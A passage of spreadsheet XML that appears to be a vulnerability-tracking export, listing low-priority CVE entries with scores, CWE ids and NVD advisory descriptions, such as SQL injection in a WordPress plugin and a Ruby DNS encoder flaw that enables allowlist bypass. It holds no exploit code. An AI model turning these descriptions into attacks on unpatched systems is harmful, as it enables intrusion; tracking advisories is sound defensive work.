          <t>Race condition in Browser in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87641</t>
        </is>
      </c>
    </row>
    <row r="1192">
      <c r="A1192" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1192" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63466</t>
        </is>
      </c>
      <c r="D1192" s="5" t="n">
        <v>4.1</v>
      </c>
      <c r="E1192" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1192" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1192" s="5" t="inlineStr"/>
      <c r="H1192" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1192" s="5" t="inlineStr"/>
      <c r="J1192" s="5" t="inlineStr"/>
      <c r="K1192" s="5" t="inlineStr"/>
      <c r="L1192" s="5" t="inlineStr"/>
      <c r="M1192" s="5" t="inlineStr"/>
      <c r="N1192" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1192" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P1192" s="5" t="inlineStr"/>
      <c r="Q1192" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="R1192" s="5" t="inlineStr">
        <is>
          <t>Unleash is an open-source feature management platform. Prior to 8.0.3, FeatureEventFormatterMd.format in src/lib/addons/feature-event-formatter-md.ts assigns Mustache.escape to an identity function before rendering action and path templates. Because Mustache.escape is process-wide, the assignment disables escaping for subsequent Mustache.render calls in email-service.ts, webhook.ts, datadog.ts, and new-relic.ts. An editor-level user can place Slack or Microsoft Teams link syntax in an unrestricted username, trigger a feature event, and inject an attacker-labeled link into a trusted outbound notification channel, while other Mustache sinks remain unescaped until restart. This issue is fixed in version 8.0.3.</t>
        </is>
      </c>
      <c r="S1192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63466</t>
        </is>
      </c>
    </row>
    <row r="1193">
      <c r="A1193" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1193" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84113</t>
        </is>
      </c>
      <c r="D1193" s="5" t="n">
        <v>4.1</v>
      </c>
      <c r="E1193" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1193" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1193" s="5" t="inlineStr"/>
      <c r="H1193" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1193" s="5" t="inlineStr"/>
      <c r="J1193" s="5" t="inlineStr"/>
      <c r="K1193" s="5" t="inlineStr"/>
      <c r="L1193" s="5" t="inlineStr"/>
      <c r="M1193" s="5" t="inlineStr"/>
      <c r="N1193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1193" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1193" s="5" t="inlineStr"/>
      <c r="Q1193" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R1193" s="5" t="inlineStr">
        <is>
          <t>The Quentn WP WordPress plugin before 1.2.15 does not properly sanitise and escape a parameter before using it in an SQL query, allowing high privilege users such as administrators to perform SQL injection attacks.</t>
        </is>
      </c>
      <c r="S1193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84113</t>
        </is>
      </c>
    </row>
    <row r="1194">
      <c r="A1194" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1194" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39113</t>
        </is>
      </c>
      <c r="D1194" s="5" t="n">
        <v>4</v>
      </c>
      <c r="E1194" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1194" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1194" s="5" t="inlineStr"/>
      <c r="H1194" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1194" s="5" t="inlineStr"/>
      <c r="J1194" s="5" t="inlineStr"/>
      <c r="K1194" s="5" t="inlineStr"/>
      <c r="L1194" s="5" t="inlineStr"/>
      <c r="M1194" s="5" t="inlineStr"/>
      <c r="N1194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1194" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P1194" s="5" t="inlineStr"/>
      <c r="Q1194" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1194" s="5" t="inlineStr">
        <is>
          <t>Buffer Overflow vulnerability in SQLite affected version source snapshots/builds containing Fossil check-in 8bdc0d485e3ad0c7a1e818da66f106951d496b05cbe61d12c2c448f2f24b6d5d (Git mirror 169f68ed88b34cb68f720191c64c058f2ccec508, 2026-03-11) and later snapshots/builds allows an attacker to cause a denial of service via the ext/misc/sqlar.c, sqlarUncompressFunc(), sqlar_uncompress(), sqlite3_value_int64(), sqlite3_malloc(int), uncompress() components</t>
        </is>
      </c>
      <c r="S1194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39113</t>
        </is>
      </c>
    </row>
    <row r="1195">
      <c r="A1195" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1195" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49312</t>
        </is>
      </c>
      <c r="D1195" s="5" t="n">
        <v>4</v>
      </c>
      <c r="E1195" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1195" s="5" t="inlineStr">
        <is>
          <t>psirt@huawei.com</t>
        </is>
      </c>
      <c r="G1195" s="5" t="inlineStr"/>
      <c r="H1195" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1195" s="5" t="inlineStr"/>
      <c r="J1195" s="5" t="inlineStr"/>
      <c r="K1195" s="5" t="inlineStr"/>
      <c r="L1195" s="5" t="inlineStr"/>
      <c r="M1195" s="5" t="inlineStr"/>
      <c r="N1195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1195" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1195" s="5" t="inlineStr"/>
      <c r="Q1195" s="5" t="inlineStr">
        <is>
          <t>CWE-264</t>
        </is>
      </c>
      <c r="R1195" s="5" t="inlineStr">
        <is>
          <t>Permission control vulnerability in the window module.
Impact: Successful exploitation of this vulnerability may affect service confidentiality.</t>
        </is>
      </c>
      <c r="S1195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49312</t>
        </is>
      </c>
    </row>
    <row r="1196">
      <c r="A1196" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1196" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79516</t>
        </is>
      </c>
      <c r="D1196" s="5" t="n">
        <v>4</v>
      </c>
      <c r="E1196" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1196" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G1196" s="5" t="inlineStr"/>
      <c r="H1196" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1196" s="5" t="inlineStr"/>
      <c r="J1196" s="5" t="inlineStr"/>
      <c r="K1196" s="5" t="inlineStr"/>
      <c r="L1196" s="5" t="inlineStr"/>
      <c r="M1196" s="5" t="inlineStr"/>
      <c r="N1196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1196" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1196" s="5" t="inlineStr"/>
      <c r="Q1196" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1196" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read in the stbsp_vsnprintf function (stb_sprintf.h) of nothings stb commit 31c1ad3 allows attackers to cause a Denial of Service (DoS) via sending a crafted input.</t>
        </is>
      </c>
      <c r="S1196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79516</t>
        </is>
      </c>
    </row>
    <row r="1197">
      <c r="A1197" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1197" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80213</t>
        </is>
      </c>
      <c r="D1197" s="5" t="n">
        <v>4</v>
      </c>
      <c r="E1197" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1197" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G1197" s="5" t="inlineStr"/>
      <c r="H1197" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1197" s="5" t="inlineStr"/>
      <c r="J1197" s="5" t="inlineStr"/>
      <c r="K1197" s="5" t="inlineStr"/>
      <c r="L1197" s="5" t="inlineStr"/>
      <c r="M1197" s="5" t="inlineStr"/>
      <c r="N1197" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1197" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P1197" s="5" t="inlineStr"/>
      <c r="Q1197" s="5" t="inlineStr">
        <is>
          <t>CWE-197</t>
        </is>
      </c>
      <c r="R1197" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in the resolv gem before 0.7.2 for Ruby. Resolv::DNS::MessageEncoder wrote a DNS label's length into a single octet without checking its range. A label longer than 255 octets had its length stored modulo 256 but the label data was written unchanged, and thus the bytes on the wire described a different name than the one the application asked to encode. RFC 1035 section 2.3.4 limits a label to 63 octets, and the two high bits of the length octet are reserved for compression pointers. put_string packed the length with put_pack("C", d.length) and put_label used it for labels, and thus any value from 0 to 255 could end up as a label length octet, including the reserved 0x40-0xBF range and the 0xC0-0xFF pointer range. Resolv::DNS::Name.create did not check per-label or total name length either, and thus an attacker-controlled hostname reached the encoder unchanged. An application that resolves an attacker-controlled hostname sends a query whose wire bytes name a domain the attacker chose. A hostname suffix that the application validates against an allowlist becomes padding that never appears on the wire, and thus allowlist and egress checks can be bypassed. The recursive resolver caches the response under the attacker's name, and DNS logs record that name rather than the one the application asked for. A label length whose low octet lands in the 0xC0-0xFF range produces a length octet that conforming parsers read as the start of a compression pointer, with the following attacker-controlled byte as the offset.</t>
        </is>
      </c>
      <c r="S1197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80213</t>
        </is>
      </c>
    </row>
    <row r="1198">
      <c r="A1198" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1198" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87486</t>
        </is>
      </c>
      <c r="D1198" s="5" t="n">
        <v>4</v>
      </c>
      <c r="E1198" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1198" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1198" s="5" t="inlineStr"/>
      <c r="H1198" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1198" s="5" t="inlineStr"/>
      <c r="J1198" s="5" t="inlineStr"/>
      <c r="K1198" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L1198" s="5" t="inlineStr"/>
      <c r="M1198" s="5" t="inlineStr"/>
      <c r="N1198" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1198" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1198" s="5" t="inlineStr"/>
      <c r="Q1198" s="5" t="inlineStr">
        <is>
          <t>CWE-1021</t>
        </is>
      </c>
      <c r="R1198" s="5" t="inlineStr">
        <is>
          <t>Clickjacking in TrustedWebActivities in Google Chrome on on Android prior to 153.0.8010.36 allowed a local attacker to spoof address bar via a co-installed app. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87486</t>
        </is>
      </c>
    </row>
    <row r="1199">
      <c r="A1199" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1199" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13144</t>
        </is>
      </c>
      <c r="D1199" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E1199" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1199" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1199" s="5" t="inlineStr"/>
      <c r="H1199" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1199" s="5" t="inlineStr"/>
      <c r="J1199" s="5" t="inlineStr"/>
      <c r="K1199" s="5" t="inlineStr"/>
      <c r="L1199" s="5" t="inlineStr"/>
      <c r="M1199" s="5" t="inlineStr"/>
      <c r="N1199" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1199" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1199" s="5" t="inlineStr"/>
      <c r="Q1199" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R1199" s="5" t="inlineStr">
        <is>
          <t>The WP Travel  WordPress plugin before 12.0.2 does not properly verify that the requester is authorized to modify the targeted booking on one branch of its bank-deposit handler, allowing an unauthenticated attacker who knows the target customer's email address to reset that customer's booking payment to an unpaid state and wipe its stored deposit-reconciliation data.</t>
        </is>
      </c>
      <c r="S1199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13144</t>
        </is>
      </c>
    </row>
    <row r="1200">
      <c r="A1200" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1200" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13146</t>
        </is>
      </c>
      <c r="D1200" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E1200" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1200" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1200" s="5" t="inlineStr"/>
      <c r="H1200" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1200" s="5" t="inlineStr"/>
      <c r="J1200" s="5" t="inlineStr"/>
      <c r="K1200" s="5" t="inlineStr"/>
      <c r="L1200" s="5" t="inlineStr"/>
      <c r="M1200" s="5" t="inlineStr"/>
      <c r="N1200" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1200" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1200" s="5" t="inlineStr"/>
      <c r="Q1200" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1200" s="5" t="inlineStr">
        <is>
          <t>The WP Travel  WordPress plugin before 12.0.2 does not properly verify that the requester owns the booking targeted by its bank-deposit slip submission, allowing an unauthenticated attacker who knows the target customer's email address to change that customer's booking payment state and attach a file to it.</t>
        </is>
      </c>
      <c r="S1200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13146</t>
        </is>
      </c>
    </row>
    <row r="1201">
      <c r="A1201" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1201" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54713</t>
        </is>
      </c>
      <c r="D1201" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E1201" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1201" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1201" s="5" t="inlineStr"/>
      <c r="H1201" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1201" s="5" t="inlineStr"/>
      <c r="J1201" s="5" t="inlineStr"/>
      <c r="K1201" s="5" t="inlineStr"/>
      <c r="L1201" s="5" t="inlineStr"/>
      <c r="M1201" s="5" t="inlineStr"/>
      <c r="N1201" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1201" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P1201" s="5" t="inlineStr"/>
      <c r="Q1201" s="5" t="inlineStr">
        <is>
          <t>CWE-1023</t>
        </is>
      </c>
      <c r="R1201" s="5" t="inlineStr">
        <is>
          <t>CakePHP Queue is a queue-interop compatible queueing library. From 0.1.11 until 2.3.1, QueueManager::getUniqueId() generates identifiers for jobs with shouldBeUnique enabled from the job class, method, and parameters, but sorting parameter values drops associative-array keys. An unauthenticated attacker who can influence job parameters can submit semantically different data that produces the same identifier, resulting in legitimate jobs dropped as duplicate collisions. This issue is fixed in version 2.3.1.</t>
        </is>
      </c>
      <c r="S1201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54713</t>
        </is>
      </c>
    </row>
    <row r="1202">
      <c r="A1202" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1202" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79690</t>
        </is>
      </c>
      <c r="D1202" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E1202" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1202" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1202" s="5" t="inlineStr"/>
      <c r="H1202" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1202" s="5" t="inlineStr"/>
      <c r="J1202" s="5" t="inlineStr"/>
      <c r="K1202" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L1202" s="5" t="inlineStr"/>
      <c r="M1202" s="5" t="inlineStr"/>
      <c r="N1202" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1202" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1202" s="5" t="inlineStr"/>
      <c r="Q1202" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R120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1202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79690</t>
        </is>
      </c>
    </row>
    <row r="1203">
      <c r="A1203" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1203" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79729</t>
        </is>
      </c>
      <c r="D1203" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E1203" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1203" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1203" s="5" t="inlineStr"/>
      <c r="H1203" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1203" s="5" t="inlineStr"/>
      <c r="J1203" s="5" t="inlineStr"/>
      <c r="K1203" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L1203" s="5" t="inlineStr"/>
      <c r="M1203" s="5" t="inlineStr"/>
      <c r="N1203" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1203" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1203" s="5" t="inlineStr"/>
      <c r="Q1203" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R120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1203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79729</t>
        </is>
      </c>
    </row>
    <row r="1204">
      <c r="A1204" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1204" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79732</t>
        </is>
      </c>
      <c r="D1204" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E1204" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1204" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1204" s="5" t="inlineStr"/>
      <c r="H1204" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1204" s="5" t="inlineStr"/>
      <c r="J1204" s="5" t="inlineStr"/>
      <c r="K1204" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L1204" s="5" t="inlineStr"/>
      <c r="M1204" s="5" t="inlineStr"/>
      <c r="N1204" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1204" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1204" s="5" t="inlineStr"/>
      <c r="Q1204" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R1204" s="5" t="inlineStr">
        <is>
          <t>Dell Secure Connect Gateway (SCG) 5.0 Appliance, versions prior to 5.36.00.xx, contains an Improper Certificate Validation vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to protection mechanism bypass.</t>
        </is>
      </c>
      <c r="S1204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79732</t>
        </is>
      </c>
    </row>
    <row r="1205">
      <c r="A1205" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1205" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79736</t>
        </is>
      </c>
      <c r="D1205" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E1205" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1205" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1205" s="5" t="inlineStr"/>
      <c r="H1205" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1205" s="5" t="inlineStr"/>
      <c r="J1205" s="5" t="inlineStr"/>
      <c r="K1205" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L1205" s="5" t="inlineStr"/>
      <c r="M1205" s="5" t="inlineStr"/>
      <c r="N1205" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1205" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1205" s="5" t="inlineStr"/>
      <c r="Q1205" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R1205"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1205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79736</t>
        </is>
      </c>
    </row>
    <row r="1206">
      <c r="A1206" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1206" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81168</t>
        </is>
      </c>
      <c r="D1206" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E1206" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1206" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1206" s="5" t="inlineStr"/>
      <c r="H1206" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1206" s="5" t="inlineStr"/>
      <c r="J1206" s="5" t="inlineStr"/>
      <c r="K1206" s="5" t="inlineStr">
        <is>
          <t>captcha_protected_page_project:captcha_protected_page</t>
        </is>
      </c>
      <c r="L1206" s="5" t="inlineStr"/>
      <c r="M1206" s="5" t="inlineStr"/>
      <c r="N1206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1206" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P1206" s="5" t="inlineStr"/>
      <c r="Q1206" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="R1206" s="5" t="inlineStr">
        <is>
          <t>Authentication Bypass Using an Alternate Path or Channel vulnerability in Drupal CAPTCHA Protected Page allows Functionality Bypass. This issue affects CAPTCHA Protected Page versions: from 0.0.0 to 1.0.2.</t>
        </is>
      </c>
      <c r="S1206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81168</t>
        </is>
      </c>
    </row>
    <row r="1207">
      <c r="A1207" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1207" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84307</t>
        </is>
      </c>
      <c r="D1207" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E1207" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1207" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1207" s="5" t="inlineStr"/>
      <c r="H1207" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1207" s="5" t="inlineStr"/>
      <c r="J1207" s="5" t="inlineStr"/>
      <c r="K1207" s="5" t="inlineStr"/>
      <c r="L1207" s="5" t="inlineStr"/>
      <c r="M1207" s="5" t="inlineStr"/>
      <c r="N1207" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1207" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P1207" s="5" t="inlineStr"/>
      <c r="Q1207" s="5" t="inlineStr">
        <is>
          <t>CWE-204</t>
        </is>
      </c>
      <c r="R1207" s="5" t="inlineStr">
        <is>
          <t>Filament is a collection of full-stack components for accelerated Laravel development. From 4.0.0 until 4.12.5 and 5.7.5, packages/panels/src/Auth/Pages/Login.php presents the multi-factor authentication challenge before evaluating canAccessPanel(). For an account that canAccessPanel() denies, submitting the correct password renders the MFA challenge while an incorrect password returns the generic authentication failure, allowing an unauthenticated attacker to confirm whether a candidate password is valid for that account. When email-based MFA is configured, the correct-password path also sends a login code to the account holder. The issue applies only to accounts that have MFA enabled and are denied panel access. Authentication is not bypassed because canAccessPanel() still runs after the challenge, and no session is created. This issue is fixed in versions 4.12.5 and 5.7.5.</t>
        </is>
      </c>
      <c r="S1207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84307</t>
        </is>
      </c>
    </row>
    <row r="1208">
      <c r="A1208" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1208" s="5" t="inlineStr">
